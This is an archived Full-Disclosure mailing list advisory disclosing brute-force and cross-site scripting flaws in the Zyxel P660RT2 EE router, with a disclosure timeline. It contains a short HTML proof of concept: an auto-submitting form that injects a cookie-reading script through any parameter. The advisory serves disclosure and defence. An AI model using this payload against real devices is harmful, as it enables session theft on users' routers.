lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Sun, 22 Jun 2014 18:23:37 +0300
From: "MustLive" <>
To: <>,
Subject: [FD] BF and XSS vulnerabilities in Zyxel P660RT2 EE

Hello list!

These are Brute Force and Cross-Site Scripting vulnerabilities in Zyxel
P660RT2 EE ADSL Router.

Affected products:

Vulnerable is the next model: Zyxel P660RT2 EE. ZyNOS Firmware Version:
V3.40 (AXN.1). This model with other firmware versions also must be
vulnerable. Zyxel ignored all vulnerabilities in this device and still
didn't fix them.


Brute Force (WASC-11):

In login form there is no protection against Brute Force
attacks. Also there is no username, only password. And taking into account,
that password automatically is put into login form, then at access via LAN
there is no need to pick up password at all.

Cross-Site Scripting (WASC-08):

Attack is going via parameter with arbitrary name (as existent, as
fictitious, like with name "1" in this example and even without name in case
of GET request).

Zyxel P660RT2 EE XSS.html

<body onLoad="document.hack.submit()">
<form name="hack" action="" method="post">
<input type="hidden" name="1" value="<body onload=alert(document.cookie)>">

XSS attack can be made as via POST, as via GET request:


2014.04.11 - announced at my site. Later informed Zyxel, but vendor ignored.
2014.06.21 - disclosed at my site (

Best wishes & regards,
Administrator of Websecurity web site 

Sent through the Full Disclosure mailing list
Web Archives & RSS:

Powered by blists - more mailing lists